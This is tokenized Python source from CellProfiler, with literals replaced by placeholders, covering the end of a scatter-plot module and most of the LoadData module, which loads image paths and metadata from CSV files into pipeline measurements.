<EOL> title = '<STR_LIT>' % ( self . title . value , workspace . measurements . image_set_number ) <EOL> else : <EOL> if self . x_source . value == cpmeas . IMAGE : <EOL> xvals = m . get_all_measurements ( cpmeas . IMAGE , self . x_axis . value ) <EOL> yvals = m . get_current_measurement ( self . get_y_object ( ) , self . y_axis . value ) <EOL> xvals = np . array ( [ xvals [ <NUM_LIT:0> ] ] * len ( yvals ) ) <EOL> else : <EOL> xvals = m . get_current_measurement ( self . get_x_object ( ) , self . x_axis . value ) <EOL> yvals = m . get_all_measurements ( cpmeas . IMAGE , self . y_axis . value ) <EOL> yvals = np . array ( [ yvals [ <NUM_LIT:0> ] ] * len ( xvals ) ) <EOL> xvals , yvals = np . array ( [ <EOL> ( x if np . isscalar ( x ) else x [ <NUM_LIT:0> ] , y if np . isscalar ( y ) else y [ <NUM_LIT:0> ] ) <EOL> for x , y in zip ( xvals , yvals ) <EOL> if ( x is not None ) and ( y is not None ) ] ) . transpose ( ) <EOL> if self . show_window : <EOL> workspace . display_data . xvals = xvals <EOL> workspace . display_data . yvals = yvals <EOL> def display ( self , workspace , figure ) : <EOL> xvals = workspace . display_data . xvals <EOL> yvals = workspace . display_data . yvals <EOL> title = '<STR_LIT:%s>' % self . title . value <EOL> figure . set_subplots ( ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> figure . subplot_scatter ( <NUM_LIT:0> , <NUM_LIT:0> , xvals , yvals , <EOL> xlabel = self . x_axis . value , <EOL> ylabel = self . y_axis . value , <EOL> xscale = self . xscale . value , <EOL> yscale = self . yscale . value , <EOL> title = title ) <EOL> def run_as_data_tool ( self , workspace ) : <EOL> self . run ( workspace ) <EOL> def upgrade_settings ( self , setting_values , variable_revision_number , <EOL> module_name , from_matlab ) : <EOL> """<STR_LIT>""" <EOL> if not from_matlab and variable_revision_number == <NUM_LIT:1> : <EOL> if setting_values [ <NUM_LIT:0> ] == cpmeas . IMAGE : <EOL> new_setting_values = [ setting_values [ <NUM_LIT:0> ] , cps . NONE , setting_values [ <NUM_LIT:1> ] , cpmeas . IMAGE , <EOL> cps . NONE ] + setting_values [ <NUM_LIT:2> : ] <EOL> else : <EOL> new_setting_values = setting_values [ : <NUM_LIT:3> ] + [ SOURCE_OBJ ] + setting_values [ <NUM_LIT:3> : ] <EOL> setting_values = new_setting_values <EOL> variable_revision_number = <NUM_LIT:2> <EOL> return setting_values , variable_revision_number , from_matlab </s>
<s> '''<STR_LIT>''' <EOL> import csv <EOL> import hashlib <EOL> import logging <EOL> import os <EOL> import sys <EOL> import numpy as np <EOL> logger = logging . getLogger ( __name__ ) <EOL> try : <EOL> from cStringIO import StringIO <EOL> except : <EOL> from StringIO import StringIO <EOL> import matplotlib . mlab <EOL> import cellprofiler . cpmodule as cpm <EOL> import cellprofiler . objects as cpo <EOL> import cellprofiler . measurements as cpmeas <EOL> import cellprofiler . settings as cps <EOL> from cellprofiler . settings import YES , NO <EOL> import cellprofiler . preferences as cpprefs <EOL> import identify as I <EOL> from cellprofiler . modules . loadimages import LoadImagesImageProvider <EOL> from cellprofiler . modules . loadimages import C_FILE_NAME , C_PATH_NAME , C_URL <EOL> from cellprofiler . modules . loadimages import C_SERIES , C_FRAME <EOL> from cellprofiler . modules . loadimages import C_OBJECTS_FILE_NAME <EOL> from cellprofiler . modules . loadimages import C_OBJECTS_PATH_NAME <EOL> from cellprofiler . modules . loadimages import C_OBJECTS_URL <EOL> from cellprofiler . measurements import C_OBJECTS_SERIES , C_OBJECTS_FRAME <EOL> from cellprofiler . modules . loadimages import C_MD5_DIGEST , C_SCALING <EOL> from cellprofiler . modules . loadimages import C_HEIGHT , C_WIDTH <EOL> from cellprofiler . modules . loadimages import bad_sizes_warning <EOL> from cellprofiler . modules . loadimages import convert_image_to_objects <EOL> from cellprofiler . modules . loadimages import pathname2url , url2pathname <EOL> from cellprofiler . preferences import standardize_default_folder_names , DEFAULT_INPUT_FOLDER_NAME , DEFAULT_OUTPUT_FOLDER_NAME , NO_FOLDER_NAME , ABSOLUTE_FOLDER_NAME , IO_FOLDER_CHOICE_HELP_TEXT <EOL> IMAGE_CATEGORIES = ( C_URL , C_FILE_NAME , C_PATH_NAME ) <EOL> OBJECTS_CATEGORIES = ( C_OBJECTS_URL , C_OBJECTS_FILE_NAME , C_OBJECTS_PATH_NAME ) <EOL> DIR_NONE = '<STR_LIT:None>' <EOL> DIR_OTHER = '<STR_LIT>' <EOL> DIR_ALL = [ DEFAULT_INPUT_FOLDER_NAME , DEFAULT_OUTPUT_FOLDER_NAME , <EOL> NO_FOLDER_NAME , ABSOLUTE_FOLDER_NAME ] <EOL> '''<STR_LIT>''' <EOL> PATH_PADDING = <NUM_LIT:20> <EOL> '''<STR_LIT>''' <EOL> header_cache = { } <EOL> def header_to_column ( field ) : <EOL> '''<STR_LIT>''' <EOL> for name in ( C_PATH_NAME , C_FILE_NAME , C_URL , <EOL> C_OBJECTS_FILE_NAME , C_OBJECTS_PATH_NAME , C_OBJECTS_URL ) : <EOL> if field . startswith ( cpmeas . IMAGE + '<STR_LIT:_>' + name + '<STR_LIT:_>' ) : <EOL> return field [ len ( cpmeas . IMAGE ) + <NUM_LIT:1> : ] <EOL> return field <EOL> def is_path_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_PATH_NAME + '<STR_LIT:_>' ) <EOL> def is_file_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_FILE_NAME + '<STR_LIT:_>' ) <EOL> def is_url_name_feature ( feature ) : <EOL> return feature . startswith ( C_URL + "<STR_LIT:_>" ) <EOL> def is_objects_path_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_OBJECTS_PATH_NAME + "<STR_LIT:_>" ) <EOL> def is_objects_file_name_feature ( feature ) : <EOL> '''<STR_LIT>''' <EOL> return feature . startswith ( C_OBJECTS_FILE_NAME + "<STR_LIT:_>" ) <EOL> def is_objects_url_name_feature ( feature ) : <EOL> return feature . startswith ( C_OBJECTS_URL + "<STR_LIT:_>" ) <EOL> def get_image_name ( feature ) : <EOL> '''<STR_LIT>''' <EOL> if is_path_name_feature ( feature ) : <EOL> return feature [ len ( C_PATH_NAME + '<STR_LIT:_>' ) : ] <EOL> if is_file_name_feature ( feature ) : <EOL> return feature [ len ( C_FILE_NAME + '<STR_LIT:_>' ) : ] <EOL> if is_url_name_feature ( feature ) : <EOL> return feature [ len ( C_URL + '<STR_LIT:_>' ) : ] <EOL> raise ValueError ( '<STR_LIT>' % feature ) <EOL> def get_objects_name ( feature ) : <EOL> '''<STR_LIT>''' <EOL> if is_objects_path_name_feature ( feature ) : <EOL> return feature [ len ( C_OBJECTS_PATH_NAME + "<STR_LIT:_>" ) : ] <EOL> if is_objects_file_name_feature ( feature ) : <EOL> return feature [ len ( C_OBJECTS_FILE_NAME + "<STR_LIT:_>" ) : ] <EOL> if is_objects_url_name_feature ( feature ) : <EOL> return feature [ len ( C_OBJECTS_URL + "<STR_LIT:_>" ) : ] <EOL> raise ValueError ( '<STR_LIT>' % feature ) <EOL> def make_path_name_feature ( image ) : <EOL> '''<STR_LIT>''' <EOL> return C_PATH_NAME + '<STR_LIT:_>' + image <EOL> def make_file_name_feature ( image ) : <EOL> '''<STR_LIT>''' <EOL> return C_FILE_NAME + '<STR_LIT:_>' + image <EOL> def make_objects_path_name_feature ( objects_name ) : <EOL> '''<STR_LIT>''' <EOL> return C_OBJECTS_PATH_NAME + '<STR_LIT:_>' + objects_name <EOL> def make_objects_file_name_feature ( objects_name ) : <EOL> '''<STR_LIT>''' <EOL> return C_OBJECTS_FILE_NAME + '<STR_LIT:_>' + objects_name <EOL> class LoadData ( cpm . CPModule ) : <EOL> module_name = "<STR_LIT>" <EOL> category = '<STR_LIT>' <EOL> variable_revision_number = <NUM_LIT:6> <EOL> def create_settings ( self ) : <EOL> self . csv_directory = cps . DirectoryPath ( <EOL> "<STR_LIT>" , allow_metadata = False , support_urls = True , <EOL> doc = """<STR_LIT>""" % globals ( ) ) <EOL> def get_directory_fn ( ) : <EOL> '''<STR_LIT>''' <EOL> return self . csv_directory . get_absolute_path ( ) <EOL> def set_directory_fn ( path ) : <EOL> dir_choice , custom_path = self . csv_directory . get_parts_from_path ( path ) <EOL> self . csv_directory . join_parts ( dir_choice , custom_path ) <EOL> self . csv_file_name = cps . FilenameText ( <EOL> "<STR_LIT>" , <EOL> cps . NONE , doc = """<STR_LIT>""" , <EOL> get_directory_fn = get_directory_fn , <EOL> set_directory_fn = set_directory_fn , <EOL> browse_msg = "<STR_LIT>" , <EOL> exts = [ ( "<STR_LIT>" , "<STR_LIT>" ) , ( "<STR_LIT>" , "<STR_LIT>" ) ] <EOL> ) <EOL> self . browse_csv_button = cps . DoSomething ( <EOL> "<STR_LIT>" , "<STR_LIT>" , self . browse_csv ) <EOL> self . wants_images = cps . Binary ( "<STR_LIT>" , True , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . rescale = cps . Binary ( <EOL> "<STR_LIT>" , True , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . image_directory = cps . DirectoryPath ( <EOL> "<STR_LIT>" , <EOL> dir_choices = DIR_ALL , allow_metadata = False , doc = """<STR_LIT>""" ) <EOL> self . wants_image_groupings = cps . Binary ( <EOL> "<STR_LIT>" , False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . metadata_fields = cps . MultiChoice ( <EOL> "<STR_LIT>" , None , doc = """<STR_LIT>""" ) <EOL> self . wants_rows = cps . Binary ( <EOL> "<STR_LIT>" , <EOL> False , doc = """<STR_LIT>""" % globals ( ) ) <EOL> self . row_range = cps . IntegerRange ( <EOL> "<STR_LIT>" , <EOL> ( <NUM_LIT:1> , <NUM_LIT> ) , <NUM_LIT:1> , doc = """<STR_LIT>""" ) <EOL> def do_reload ( ) : <EOL> global header_cache <EOL> header_cache = { } <EOL> try : <EOL> self . open_csv ( ) <EOL> except : <EOL> pass <EOL> self . clear_cache_button = cps . DoSomething ( <EOL> "<STR_LIT>" , "<STR_LIT>" , do_reload , doc = """<STR_LIT>""" ) <EOL> def settings ( self ) : <EOL> return [ self . csv_directory , <EOL> self . csv_file_name , self . wants_images , self . image_directory , <EOL> self . wants_rows , <EOL> self . row_range , self . wants_image_groupings , <EOL> self . metadata_fields , self . rescale ] <EOL> def validate_module ( self , pipeline ) : <EOL> csv_path = self . csv_path <EOL> if self . csv_directory . dir_choice != cps . URL_FOLDER_NAME : <EOL> if not os . path . isfile ( csv_path ) : <EOL> raise cps . ValidationError ( "<STR_LIT>" % csv_path , <EOL> self . csv_file_name ) <EOL> try : <EOL> self . open_csv ( ) <EOL> except IOError , e : <EOL> import errno <EOL> if e . errno == errno . EWOULDBLOCK : <EOL> raise cps . ValidationError ( "<STR_LIT>" % <EOL> self . csv_path , self . csv_file_name ) <EOL> else : <EOL> raise cps . ValidationError ( "<STR_LIT>" % <EOL> ( self . csv_path , e ) , self . csv_file_name ) <EOL> try : <EOL> self . get_header ( ) <EOL> except Exception , e : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" % <EOL> ( self . csv_path , e ) , self . csv_file_name ) <EOL> def validate_module_warnings ( self , pipeline ) : <EOL> '''<STR_LIT>''' <EOL> from cellprofiler . modules . loadimages import LoadImages <EOL> for module in pipeline . modules ( ) : <EOL> if id ( module ) == id ( self ) : <EOL> return <EOL> if isinstance ( module , LoadData ) : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , self . csv_file_name ) <EOL> if isinstance ( module , LoadImages ) : <EOL> raise cps . ValidationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , self . csv_file_name ) <EOL> if self . wants_image_groupings . value and ( len ( self . metadata_fields . selections ) == <NUM_LIT:0> ) : <EOL> raise cps . ValidationError ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> self . metadata_fields ) <EOL> def visible_settings ( self ) : <EOL> result = [ self . csv_directory , self . csv_file_name , <EOL> self . browse_csv_button ] <EOL> if self . csv_directory . dir_choice == cps . URL_FOLDER_NAME : <EOL> result += [ self . clear_cache_button ] <EOL> self . csv_file_name . text = "<STR_LIT>" <EOL> self . csv_file_name . set_browsable ( False ) <EOL> else : <EOL> self . csv_file_name . text = "<STR_LIT>" <EOL> self . csv_file_name . set_browsable ( True ) <EOL> result += [ self . wants_images ] <EOL> if self . wants_images . value : <EOL> result += [ self . rescale , self . image_directory , <EOL> self . wants_image_groupings ] <EOL> if self . wants_image_groupings . value : <EOL> result += [ self . metadata_fields ] <EOL> try : <EOL> fields = [ field [ len ( "<STR_LIT>" ) : ] <EOL> for field in self . get_header ( ) <EOL> if field . startswith ( "<STR_LIT>" ) ] <EOL> if self . has_synthetic_well_metadata ( ) : <EOL> fields += [ cpmeas . FTR_WELL ] <EOL> self . metadata_fields . choices = fields <EOL> except : <EOL> self . metadata_fields . choices = [ "<STR_LIT>" ] <EOL> result += [ self . wants_rows ] <EOL> if self . wants_rows . value : <EOL> result += [ self . row_range ] <EOL> return result <EOL> def convert ( self ) : <EOL> data = matplotlib . mlab . csv2rec ( self . csv_path ) <EOL> src_dsc = data [ '<STR_LIT>' ] <EOL> def uniquewaves ( seq ) : <EOL> output = [ ] <EOL> for x in seq : <EOL> if x not in output : <EOL> output . append ( x ) <EOL> return output <EOL> waves = uniquewaves ( src_dsc ) <EOL> pathname = [ ] <EOL> filename = [ ] <EOL> wave_pnames = [ ] <EOL> wave_fnames = [ ] <EOL> for i in range ( len ( waves ) ) : <EOL> mask = data [ '<STR_LIT>' ] == waves [ i ] <EOL> pathname . append ( data [ mask ] [ '<STR_LIT>' ] ) <EOL> filename . append ( data [ mask ] [ '<STR_LIT>' ] ) <EOL> wave_pnames . append ( '<STR_LIT>' % ( waves [ i ] . strip ( '<STR_LIT:">' ) ) ) <EOL> wave_fnames . append ( '<STR_LIT>' % ( waves [ i ] . strip ( '<STR_LIT:">' ) ) ) <EOL> for i in range ( len ( waves ) ) : <EOL> if len ( filename [ i ] ) != len ( filename [ <NUM_LIT:0> ] ) : <EOL> raise RuntimeError ( "<STR_LIT>" % <EOL> ( wave_fnames [ i ] , len ( filename [ i ] ) , wave_fnames [ <NUM_LIT:0> ] , len ( filename [ <NUM_LIT:0> ] ) ) ) <EOL> def metadatacols ( header ) : <EOL> output = [ ] <EOL> for h in header : <EOL> if not h . startswith ( '<STR_LIT>' ) : <EOL> if isinstance ( h , unicode ) : <EOL> output . append ( h . encode ( "<STR_LIT:utf-8>" ) ) <EOL> else : <EOL> output . append ( h ) <EOL> return output <EOL> def data_for_one_wave ( data ) : <EOL> mask = data [ '<STR_LIT>' ] == waves [ <NUM_LIT:0> ] <EOL> data_onewave = data [ mask ] <EOL> return data_onewave <EOL> header = data . dtype . names <EOL> metadata_names = metadatacols ( header ) <EOL> data_onewave = data_for_one_wave ( data ) <EOL> strdate = [ ] <EOL> for date in data_onewave [ '<STR_LIT>' ] : <EOL> strdate += [ str ( date ) ] <EOL> metadata_names . remove ( '<STR_LIT>' ) <EOL> metadata_names . remove ( '<STR_LIT>' ) <EOL> data_onewave_nofilepaths = matplotlib . mlab . rec_keep_fields ( data_onewave , metadata_names ) <EOL> metadata_names = [ '<STR_LIT>' + m for m in metadata_names ] <EOL> data_onewave_nofilepaths . dtype . names = metadata_names <EOL> final_data = data_onewave_nofilepaths <EOL> final_data = matplotlib . mlab . rec_append_fields ( final_data , '<STR_LIT>' , strdate ) <EOL> for i in range ( len ( waves ) ) : <EOL> final_data = matplotlib . mlab . rec_append_fields ( final_data , wave_pnames [ i ] , pathname [ i ] ) <EOL> final_data = matplotlib . mlab . rec_append_fields ( final_data , wave_fnames [ i ] , filename [ i ] ) <EOL> return final_data <EOL> @ property <EOL> def csv_path ( self ) : <EOL> '''<STR_LIT>''' <EOL> if cpprefs . get_data_file ( ) is not None : <EOL> return cpprefs . get_data_file ( ) <EOL> if self . csv_directory . dir_choice == cps . URL_FOLDER_NAME : <EOL> return self . csv_file_name . value <EOL> path = self . csv_directory . get_absolute_path ( ) <EOL> return os . path . join ( path , self . csv_file_name . value ) <EOL> @ property <EOL> def image_path ( self ) : <EOL> return self . image_directory . get_absolute_path ( ) <EOL> @ property <EOL> def legacy_field_key ( self ) : <EOL> '''<STR_LIT>''' <EOL> return '<STR_LIT>' % self . module_num <EOL> def get_cache_info ( self ) : <EOL> '''<STR_LIT>''' <EOL> global header_cache <EOL> entry = header_cache . get ( self . csv_path , dict ( ctime = <NUM_LIT:0> ) ) <EOL> if cpprefs . is_url_path ( self . csv_path ) : <EOL> if not header_cache . has_key ( self . csv_path ) : <EOL> header_cache [ self . csv_path ] = entry <EOL> return entry <EOL> ctime = os . stat ( self . csv_path ) . st_ctime <EOL> if ctime > entry [ "<STR_LIT>" ] : <EOL> entry = header_cache [ self . csv_path ] = { } <EOL> entry [ "<STR_LIT>" ] = ctime <EOL> return entry <EOL> def open_csv ( self , do_not_cache = False ) : <EOL> '''<STR_LIT>''' <EOL> global header_cache <EOL> if cpprefs . is_url_path ( self . csv_path ) : <EOL> if not header_cache . has_key ( self . csv_path ) : <EOL> header_cache [ self . csv_path ] = { } <EOL> entry = header_cache [ self . csv_path ] <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> raise entry [ "<STR_LIT>" ] <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> fd = StringIO ( entry [ "<STR_LIT>" ] ) <EOL> else : <EOL> if do_not_cache : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> import urllib2 <EOL> try : <EOL> url_fd = urllib2 . urlopen ( self . csv_path ) <EOL> except Exception , e : <EOL> entry [ "<STR_LIT>" ] = e <EOL> raise e <EOL> fd = StringIO ( ) <EOL> while True : <EOL> text = url_fd . read ( ) <EOL> if len ( text ) == <NUM_LIT:0> : <EOL> break <EOL> fd . write ( text ) <EOL> fd . seek ( <NUM_LIT:0> ) <EOL> entry [ "<STR_LIT>" ] = fd . getvalue ( ) <EOL> return fd <EOL> else : <EOL> return open ( self . csv_path , '<STR_LIT:rb>' ) <EOL> def browse_csv ( self ) : <EOL> import wx <EOL> from cellprofiler . gui import get_cp_icon <EOL> try : <EOL> fd = self . open_csv ( ) <EOL> except : <EOL> wx . MessageBox ( "<STR_LIT>" % self . csv_path ) <EOL> return <EOL> reader = csv . reader ( fd ) <EOL> header = reader . next ( ) <EOL> frame = wx . Frame ( wx . GetApp ( ) . frame , title = self . csv_path ) <EOL> sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> frame . SetSizer ( sizer ) <EOL> list_ctl = wx . ListCtrl ( frame , style = wx . LC_REPORT ) <EOL> sizer . Add ( list_ctl , <NUM_LIT:1> , wx . EXPAND ) <EOL> for i , field in enumerate ( header ) : <EOL> list_ctl . InsertColumn ( i , field ) <EOL> for line in reader : <EOL> list_ctl . Append ( [ unicode ( s , '<STR_LIT:utf8>' ) if isinstance ( s , str ) else s <EOL> for s in line [ : len ( header ) ] ] ) <EOL> frame . SetMinSize ( ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> frame . SetIcon ( get_cp_icon ( ) ) <EOL> frame . Fit ( ) <EOL> frame . Show ( ) <EOL> def get_header ( self , do_not_cache = False ) : <EOL> '''<STR_LIT>''' <EOL> entry = self . get_cache_info ( ) <EOL> if entry . has_key ( "<STR_LIT>" ) : <EOL> return entry [ "<STR_LIT>" ] <EOL> fd = self . open_csv ( do_not_cache = do_not_cache ) <EOL> reader = csv . reader ( fd ) <EOL> header = reader . next ( ) <EOL> fd . close ( ) <EOL> if header [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> data = self . convert ( ) <EOL> except Exception , e : <EOL> raise RuntimeError ( "<STR_LIT:%s>" % e ) <EOL> header = data . dtype . names <EOL> entry [ "<STR_LIT>" ] = [ header_to_column ( column ) for column in header ] <EOL> return entry [ "<STR_LIT>" ] <EOL> def get_image_names ( self , do_not_cache = False ) : <EOL> header = self . get_header ( do_not_cache = do_not_cache ) <EOL> image_names = set ( [ <EOL> get_image_name ( field ) <EOL> for field in header <EOL> if is_file_name_feature ( field ) or is_url_name_feature ( field ) ] ) <EOL> return list ( image_names ) <EOL> def get_object_names ( self , do_not_cache = False ) : <EOL> header = self . get_header ( do_not_cache = do_not_cache ) <EOL> object_names = set ( [ get_objects_name ( field ) <EOL> for field in header <EOL> if is_objects_file_name_feature ( field ) or <EOL> is_objects_url_name_feature ( field ) ] ) <EOL> return list ( object_names ) <EOL> def other_providers ( self , group ) : <EOL> '''<STR_LIT>''' <EOL> if group == '<STR_LIT>' and self . wants_images . value : <EOL> try : <EOL> return self . get_image_names ( do_not_cache = True ) <EOL> except Exception , e : <EOL> return [ ] <EOL> elif group == '<STR_LIT>' and self . wants_images : <EOL> try : <EOL> return self . get_object_names ( do_not_cache = True ) <EOL> except Exception , e : <EOL> return [ ] <EOL> return [ ] <EOL> def is_image_from_file ( self , image_name ) : <EOL> '''<STR_LIT>''' <EOL> providers = self . other_providers ( '<STR_LIT>' ) <EOL> return image_name in providers <EOL> def is_load_module ( self ) : <EOL> '''<STR_LIT>''' <EOL> return True <EOL> def prepare_run ( self , workspace ) : <EOL> pipeline = workspace . pipeline <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> '''<STR_LIT>''' <EOL> if pipeline . in_batch_mode ( ) : <EOL> return True <EOL> fd = self . open_csv ( ) <EOL> reader = csv . reader ( fd ) <EOL> header = [ header_to_column ( column ) for column in reader . next ( ) ] <EOL> if header [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> reader = self . convert ( ) <EOL> header = list ( reader . dtype . names ) <EOL> if self . wants_rows . value : <EOL> rows = [ ] <EOL> for idx , row in enumerate ( reader ) : <EOL> if idx + <NUM_LIT:1> < self . row_range . min : <EOL> continue <EOL> if idx + <NUM_LIT:1> > self . row_range . max : <EOL> break <EOL> if len ( row ) == <NUM_LIT:0> : <EOL> continue <EOL> row = [ unicode ( s , '<STR_LIT:utf8>' ) if isinstance ( s , str ) else s <EOL> for s in row ] <EOL> if len ( row ) != len ( header ) : <EOL> raise ValueError ( "<STR_LIT>" % <EOL> ( i , len ( row ) , len ( header ) ) ) <EOL> rows . append ( row ) <EOL> else : <EOL> rows = [ [ unicode ( s , '<STR_LIT:utf8>' ) if isinstance ( s , str ) else s <EOL> for s in row ] for row in reader <EOL> if len ( row ) > <NUM_LIT:0> ] <EOL> fd . close ( ) <EOL> n_fields = len ( header ) <EOL> for i , row in enumerate ( rows ) : <EOL> if len ( row ) < n_fields : <EOL> text = ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) % ( <EOL> i + <NUM_LIT:2> , self . csv_file_name . value , <EOL> '<STR_LIT:U+002C>' . join ( row ) , <EOL> len ( row ) , n_fields ) <EOL> raise ValueError ( text ) <EOL> elif len ( row ) > n_fields : <EOL> del row [ n_fields : ] <EOL> metadata_columns = { } <EOL> object_columns = { } <EOL> image_columns = { } <EOL> well_row_column = well_column_column = well_well_column = None <EOL> for i , column in enumerate ( header ) : <EOL> if column . find ( "<STR_LIT:_>" ) == - <NUM_LIT:1> : <EOL> category = "<STR_LIT>" <EOL> feature = column <EOL> else : <EOL> category , feature = column . split ( "<STR_LIT:_>" , <NUM_LIT:1> ) <EOL> if category in IMAGE_CATEGORIES : <EOL> if not image_columns . has_key ( feature ) : <EOL> image_columns [ feature ] = [ ] <EOL> image_columns [ feature ] . append ( i ) <EOL> elif category in OBJECTS_CATEGORIES : <EOL> if not object_columns . has_key ( feature ) : <EOL> object_columns [ feature ] = [ ] <EOL> object_columns [ feature ] . append ( i ) <EOL> else : <EOL> metadata_columns [ column ] = i <EOL> if category == cpmeas . C_METADATA : <EOL> if feature . lower ( ) == cpmeas . FTR_WELL . lower ( ) : <EOL> well_well_column = i <EOL> elif cpmeas . is_well_row_token ( feature ) : <EOL> well_row_column = i <EOL> elif cpmeas . is_well_column_token ( feature ) : <EOL> well_column_column = i <EOL> if ( well_row_column is not None and well_column_column is not None and <EOL> well_well_column is None ) : <EOL> metadata_columns [ cpmeas . M_WELL ] = len ( header ) <EOL> header . append ( cpmeas . M_WELL ) <EOL> for row in rows : <EOL> row . append ( row [ well_row_column ] + row [ well_column_column ] ) <EOL> if self . wants_images : <EOL> if self . image_directory . dir_choice == cps . NO_FOLDER_NAME : <EOL> path_base = "<STR_LIT>" <EOL> else : <EOL> path_base = self . image_path <EOL> for d , url_category , file_name_category , path_name_category in ( <EOL> ( image_columns , C_URL , C_FILE_NAME , C_PATH_NAME ) , <EOL> ( object_columns , C_OBJECTS_URL , C_OBJECTS_FILE_NAME , <EOL> C_OBJECTS_PATH_NAME ) ) : <EOL> for name in d . keys ( ) : <EOL> url_column = file_name_column = path_name_column = None <EOL> for k in d [ name ] : <EOL> if header [ k ] . startswith ( url_category ) : <EOL> url_column = k <EOL> elif header [ k ] . startswith ( file_name_category ) : <EOL> file_name_column = k <EOL> elif header [ k ] . startswith ( path_name_category ) : <EOL> path_name_column = k <EOL> if url_column is None : <EOL> if file_name_column is None : <EOL> raise ValueError ( <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % ( file_name_category , name , <EOL> path_name_category , name ) ) <EOL> d [ name ] . append ( len ( header ) ) <EOL> url_feature = "<STR_LIT:_>" . join ( ( url_category , name ) ) <EOL> header . append ( url_feature ) <EOL> for row in rows : <EOL> if path_name_column is None : <EOL> fullname = os . path . join ( path_base , <EOL> row [ file_name_column ] ) <EOL> else : <EOL> row_path_name = os . path . join ( <EOL> path_base , row [ path_name_column ] ) <EOL> fullname = os . path . join ( <EOL> row_path_name , row [ file_name_column ] ) <EOL> row [ path_name_column ] = row_path_name <EOL> url = pathname2url ( fullname ) <EOL> row . append ( url ) <EOL> if path_name_column is None : <EOL> d [ name ] . append ( len ( header ) ) <EOL> path_feature = "<STR_LIT:_>" . join ( ( path_name_category , name ) ) <EOL> header . append ( path_feature ) <EOL> for row in rows : <EOL> row . append ( path_base ) <EOL> elif path_name_column is None and file_name_column is None : <EOL> path_feature = "<STR_LIT:_>" . join ( ( path_name_category , name ) ) <EOL> path_name_column = len ( header ) <EOL> header . append ( path_feature ) <EOL> file_name_feature = "<STR_LIT:_>" . join ( ( file_name_category , name ) ) <EOL> file_name_column = len ( header ) <EOL> header . append ( file_name_feature ) <EOL> for row in rows : <EOL> url = row [ url_column ] <EOL> idx = url . rfind ( "<STR_LIT:/>" ) <EOL> if idx == - <NUM_LIT:1> : <EOL> idx = url . rfind ( "<STR_LIT::>" ) <EOL> if idx == - <NUM_LIT:1> : <EOL> row += [ "<STR_LIT>" , url ] <EOL> else : <EOL> row += [ url [ : ( idx + <NUM_LIT:1> ) ] , url [ ( idx + <NUM_LIT:1> ) : ] ] <EOL> else : <EOL> row += [ url [ : idx ] , url [ ( idx + <NUM_LIT:1> ) : ] ] <EOL> column_type = { } <EOL> for column in self . get_measurement_columns ( pipeline ) : <EOL> column_type [ column [ <NUM_LIT:1> ] ] = column [ <NUM_LIT:2> ] <EOL> previous_column_types = dict ( [ <EOL> ( c [ <NUM_LIT:1> ] , c [ <NUM_LIT:2> ] ) for c in pipeline . get_measurement_columns ( self ) <EOL> if c [ <NUM_LIT:0> ] == cpmeas . IMAGE ] ) <EOL> columns = { } <EOL> for index , feature in enumerate ( header ) : <EOL> c = [ ] <EOL> columns [ feature ] = c <EOL> for row in rows : <EOL> value = row [ index ] <EOL> if column_type . has_key ( feature ) : <EOL> datatype = column_type [ feature ] <EOL> else : <EOL> datatype = previous_column_types [ feature ] <EOL> if datatype == cpmeas . COLTYPE_INTEGER : <EOL> value = int ( value ) <EOL> elif datatype == cpmeas . COLTYPE_FLOAT : <EOL> value = float ( value ) <EOL> c . append ( value ) <EOL> if len ( metadata_columns ) > <NUM_LIT:0> : <EOL> image_numbers = m . match_metadata ( <EOL> metadata_columns . keys ( ) , <EOL> [ columns [ k ] for k in metadata_columns . keys ( ) ] ) <EOL> image_numbers = np . array ( image_numbers , int ) . flatten ( ) <EOL> max_image_number = np . max ( image_numbers ) <EOL> new_columns = { } <EOL> for key , values in columns . iteritems ( ) : <EOL> new_values = [ None ] * max_image_number <EOL> for image_number , value in zip ( image_numbers , values ) : <EOL> new_values [ image_number - <NUM_LIT:1> ] = value <EOL> new_columns [ key ] = new_values <EOL> columns = new_columns <EOL> for feature , values in columns . iteritems ( ) : <EOL> m . add_all_measurements ( cpmeas . IMAGE , feature , values ) <EOL> if self . wants_image_groupings and len ( self . metadata_fields . selections ) > <NUM_LIT:0> : <EOL> keys = [ "<STR_LIT:_>" . join ( ( cpmeas . C_METADATA , k ) ) <EOL> for k in self . metadata_fields . selections ] <EOL> m . set_grouping_tags ( keys ) <EOL> return True <EOL> def prepare_to_create_batch ( self , workspace , fn_alter_path ) : <EOL> '''<STR_LIT>''' <EOL> if self . wants_images : <EOL> m = workspace . measurements <EOL> assert isinstance ( m , cpmeas . Measurements ) <EOL> image_numbers = m . get_image_numbers ( ) <EOL> all_image_features = m . get_feature_names ( cpmeas . IMAGE ) <EOL> for url_category , file_category , path_category , names in ( <EOL> ( C_URL , C_FILE_NAME , C_PATH_NAME , self . get_image_names ( ) ) , <EOL> ( C_OBJECTS_URL , C_OBJECTS_FILE_NAME , C_OBJECTS_PATH_NAME , <EOL> self . get_object_names ( ) ) ) : <EOL> for name in names : <EOL> url_feature = 